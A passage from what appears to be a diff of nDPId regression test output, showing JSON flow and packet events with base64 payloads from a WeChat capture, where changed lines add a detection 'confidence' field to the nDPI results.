AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00725{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}}
+00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}}
 00911{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1492167350386,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"ts_msec":1492167350386,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCvylAAEAR9BXAqAFnrNkXQ8kzAbsBbud7DTHWY7YNkySLUTAzNQLvwr0xyGRZ7meDZlovLzVjAbbzC3jR2f2rSyaEQR29GdHUR3g0xdsFTdTip7X1Nnsf4tYU5MBGkSRYowzYqBAgeAEueiV49O5ngVqvp6AacuKzAzgJV3z622EcXJUEyhTJ+nOIANjFkaDTQTI+jdNEu4FfF\/TnyxM++AGJ3to5M6SWYBz2BeCP\/OGMSC7yUukPIe4sRQeIQcXq+IYSj3PAlHKxZT8HDRP7kjwgghqQy0grhbmgn+9HaZmoQLo9gu4ijkDWy6wUW+W8oMWbJ3Ky6wEFXzApvzV\/FZNjJh6PDtkHubM5JHhhh00iIakeLzopZrU7PnZst39suCb9JKpUYtFvmoJnG3+X2ld76667v+kx3ZpHcdgXPlvpm8rm+2k6Em\/vgF23i7kHM9aRW5K+1InNa4QsADwuokzDCUylLbXZYixDaZtGruoPUyaIkf6OjyLbS2SNBQ=="}
 02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1492167350462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1492167350462,"pkt":"8IQvSpdgeJKcD6iOCABFAAVivzBAAEAR8C7AqAFnrNkXQ8kzAbsFTm8mDTHWY7YNkySLUTAzNQMCK\/NUmHquSjxA+X2gAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zc2wuZ3N0YXRpYy5jb23DJ9pgKUoswhKlaAfLoi3sQZPhfUFgtpep51u0rkbBgx\/nebVFToqDPqkbsFtGn3MXCPqLWhc6j\/ixUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq2MDAwMDAwMDC6zWefDMewsHm6e\/MeaJgBlt0fDWQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAtqrwWAAAAAA5eOlJA3D70ONW2AJf\/ogbdqDz00OrZf\/OgXQcK6rvrAta8o74ustrYp5ItVHeFC1VJKErdNkin676crWgBJJhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees3ygAAW65hsjHRUCwmcSnHJYniTszHhABKgaojbj7US89crmIZu34dDjUIs9wDqj3f87VRLZoVe0zMx1t+ZFc1SOwYij5LWSM1YcolsQBx9V4iuTevcGsCo1kr3VNCHdz7PtfP9d6GZNrg2+YgXWbXAAnfNe23tKnBUPczWdseoa1PkV+7toc2QUBJDmQV3Doscx5oizBP3jmujZdyIIvaDPKntnnsjC8AAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1492167351026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1492167351026,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92FdAAEAR3aLAqAFnwKgB\/to2ADUAKSL33acBAAABAAAAAAAABGRvY3MGZ29vZ2xlA2NvbQAAAQAB"}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1492167351061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"ts_msec":1492167351061,"pkt":"eJKcD6iO8IQvSpdgCABFoADVAABAAEARtMLAqAH+wKgBZwA12jYAwUoh3aeBgAABAAEABAAEBGRvY3MGZ29vZ2xlA2NvbQAAAQABwAwAAQABAAAA2QAE2DrGLsARAAIAAQACiyoABgNuczLAEcARAAIAAQACiyoABgNuczHAEcARAAIAAQACiyoABgNuczPAEcARAAIAAQACiyoABgNuczTAEcBPAAEAAQAFOEYABNjvIArAPQABAAEABS50AATY7yIKwGEAAQABAAUudAAE2O8kCsBzAAEAAQAFLnQABNjvJgo="}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1492167351061,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.198.46"}}
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1492167351061,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.198.46"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02241{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1492167351067,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAVibQVAAEARaA3AqAFn2DrGLuD3AbsFTsxKDU3ZCrKMtFhpUTAzNQFnbJE8FVI6Xr9TUAWgAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1kb2NzLmdvb2dsZS5jb21yl6H2wP73bUTm\/HO\/L6W7bp3Xhczs9ysCSmeki\/j96A7sEoRFEAE+SB65YLwp5s+42jMDuJu4lkMvUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq3MDAwMDAwMDCSV1vE+gNbm7+W8XblWvpmJ\/49qGQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAt6rwWAAAAADtcasM4uYqOdGcPkgWTuPinp6tSgmHbpcCw+LDtPZmZuBaJu0QIw4bgS6gnY4km2fVf4E4bxQZEQJVfGW2\/zkLZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmueetXmAEAL+XPr519ndPJ3mPFBWs\/DigCPL0uG+UOo9PlVynP5lP7SYDz1bkGMXY1YNt3+9e\/xaovsHZwZUHeJNaLtZCflec\/IAM0fVlrvjwb6nbNCsXZz6\/cPg4kuVRS2mBg046WN6uU3IIy4QYEX9WeFcdSLySSFcZAp9Y92PScUgAJmXEYeE91IXZUb3jX3RMxTRdpIGidUSIrQaDk8neMszYOzIv3i7wAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}}
 01686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1492167351067,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":969,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":969,"pkt_l4_len":935,"ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAO7bQZAAEARabPAqAFn2DrGLuD3AbsDp2YqDU3ZCrKMtFhpUTAzNQJxZNfHCC8u2f35luXQX7wk8+5+gy499Uo4Fg20rRdDDy5CsdXoRXrF+phU81nis1nRDRx09GXiKDxOppPR5wHoCPv6GGJ1a2aSeKMbWb+zwKTlNc+IgrbKFFqH047ViEQZsFLjifeqmjWw3kLjF9wuTO5xmTDc8NygVX92ZUjcWiRsZklVVPx3NbEThZxDUrne5HeS9hEKQhiWqsRNFsJ5ZewxcV+5cYvvBeYiQR+kS3f\/LZqZAjI6Q5gDCFVg4IVHBTbsdm3CNW6MkXX6Z21DpqBMIia1Z2wV8I9lmIjOLOKjoJcu+pem0sj3G6u1FBaJ6UzuToaeQVFoQV1B7THlLpcbWhfyxWuv5Vq5Nhbvz\/hy9e3GvHaPkX2Ap3unG8P22QcYcGd\/BWZtvoWlpacJDV2epOkkS7tt5wlFKOWfO8\/5Yu\/gJ5xuBFw7XGdmQknr+9LaS3e8wZiMR1ZfimH2Wrss8HcQEl9TcUi0OPt7hg4vPxA1umUMgAjxmP3GICQIJ8v3MSyfSe36zfbmMnzMFR+cZ4RVKOKFuZsig3U7Qla3oB3K2bziFfb7gRL+hERHc4YgKgGNFngj+oqw2jdkj\/RqXvOIZPBl74wKoDpJdAAu0pwpTpg0OYCvwu\/ep3j0WkfwnzYcwnEEOfrkyBT8sslKLByrPD6217xh62Bp0UxecAcjRSXYnXrLG4gF\/OklBRUl9MWf17862YoGJ6mbQ8Q1BCG\/ur1PzAt2\/FqJ05MHkwrkRVSHl4pDeBaR66Du4ZmV0GBx989HTukTQy\/3OGUKXjAXhJdjcsLd1jo\/K0yDhk26WE7HHoqWgHvMgQjGE2RFzuX36OVzPCIEOwd9oe0YVvAfM\/rVc9genM5Hy7Sv8mutamuMH7bROMktPGAdZ\/IFx5w4VWad64HIS2eSUBLGRLvosHNSRrNdfupAMBGIyjJeytCFI+Ljtgl1sqegx6JwAaGxpjS+ZJjXdtHKXMd1GSxa\/aZjv\/gLSgGEeQHgpM0w997OPOSc\/oXhrMG2H9dPnVY0gxfZjD+EVSDAUqgCePMf4Xk+wruAsQ37\/lHXudBmH90ljRj8ye51wbrJXjVUKo39iLcU6hZ05\/StCBdO\/xPb895mMSP5JnWfCWFSaYGQN4FQQYatRm1PasNLHcHWO0PLezKCDM2gsmrDE3X\/KwGBhJhce2KxIu1Tjfe9ZeVoyy0Oxy0Bb7O\/93ta"}
 02263{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1492167351121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1492167351121,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcR3XLYOsYuwKgBZwG74PcFTmzaBOou0Nigzud3ZaOudETm8GBczN7q3HxIUIOzVIoPsD73AQkDw5o48VPCPgxwE9bagOsfguW4BXFTqIT1IIV5ThjijbPacPMIeuYY+tLcR\/SESotUnfD6k31MBpngxATfGEoS3TSTc9aVt2BKPUkJNXTxIqajXh4z+2CjCT16kZiox8Qmel6o7NAeDdJDfOL+51L\/G92mnF40IupMo8kyn6Yeya9Ad1Q2D\/p2FAN4KbvETwnyCCrN\/3BzK6jhLgRMRUMpD76aZzYbZwTnnjn5cPWJgIaiNlEoyxA7CP6REtuotFUshn\/4\/Je7Jbm8GzbVpuThmCVdHsCKO9eQafmXETXyGPOX37U\/+RYvpidmrbPADR3IJ0YyPcE55eQPeQ3SLMLpJR+N0H26d91w3L3p89mtepH0NeIecXxbZcygXiO3ouImKiBH5Sols1nP6qAehqtyidEipR4ZPAV4Xw0h5rAYVjkhxL41hJnSJmoocaWAxV46W2QvJzsrabDi5M9SzvhRJAsPZZY4K6G5dvQpS2uzTzQOzxWkGBlQl7RRRgKZIcNK4yIcQD0yIGCwwoktA2Ld1Idk2Cu5os+Y7KXAeUWL4EghycwrRGckuLuUQjKt2wiWE8fO7O4\/Lv2VZCpq74PXu3G5CCkcU65VQJeeZrPt8UoeqowDQ+esOAIZ137WnNojv8+UsGDeg+xMKBRUrYaoT8ER8YifN6riDqUjipfNYkbEn8ucoDGqAIlyleAS5\/XHM13il1iRyxEOLilein7LTbUQNfwFOf8EzXgCnR+IpNR4wHUKNWXhmNPOYokIP23Sl\/FaC5yeTIvYRTQb\/x8mhYj\/WIs05PouLe9Pt+TRR3N2YyYcD4kqZDJk1bVFKuF7bqCGCM51z3lvURyUWHByifpl1Q0srxqBnb92qDujj+Ug5Hs9Ty\/kFB8qHvx1Dfq78jAeHz0fzz7AMlq+79RPkRIGLCbIkRGUTiiYKOqV8DW1cQsg\/KZWg+kdRSdfwb30mOCaUqILvOyhuHsdt\/VlQOncdoNcoPzCka952teJvpu3kHP0JF00GT6\/QgvMxqqvMT68gpqKr7VNH2JM4rMWfmQe7d70oO4rLXnu5+c5UkqU4+\/yoY+zdy1UMw3UYnE\/RB4x5v7QiQt4jRnCl6tLIdDw9lQg9IzEnVZzw2lt7lY+\/FC4dmux3GBahkU7C9wFjO9v95glXVXJsAYEhvS3wJvsdmH9ydK\/F3zD4bHe6QH8wln\/KtF+\/2hcmCsTO+QWhFCYnQytBu\/Dd7UqbnYMeu6CvYKHngUiBNqyzWOGJEUUIwiWru1HLQ+oi18IFAgJS2Pl99aG5LYQ83XtdOxJ4pO0nKlJ0xc1wx6vqc9D94XgPsJhPmRnKuyWzZTwOjFjJ4fG3PqBIeO52giJ97T6kI1ufnseC2DoOQ7mgmmkhk1xFPh\/iCEO2sH8\/yvC3ciJ3q1jHvS6trEx0psWwZhrcKMoj6uJQAqWOx\/4VMZblPtRO0JRK2sKrnR0AuXFvTgyJJXrSQnKCt4f0Ie08Z0FhokeNmZugGY11eoMg2b0Ohw1Gcl+Nco\/Mm0dOR0d0ZzowYYFQVn8Z1G5U0v2I0P+bjqBg\/Oft0VL\/uESmpcBS8+q9YYq03mdZfyrm0Wll6v2MrVZ+luVDiDPf+2zCNGMeJyqwXqCBY\/GUBtV\/ORVHwTg4O9+bDUiGoGMfoIrfv0WX52viV1sxsvodgKw\/K7R89paaPWnO6gRTKekrbX0nVKtcWseMnbmEds6efJmpuqUD3hZqUyUuRhdxz6a7pUXagTh"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -71,22 +71,22 @@
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"}
-00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
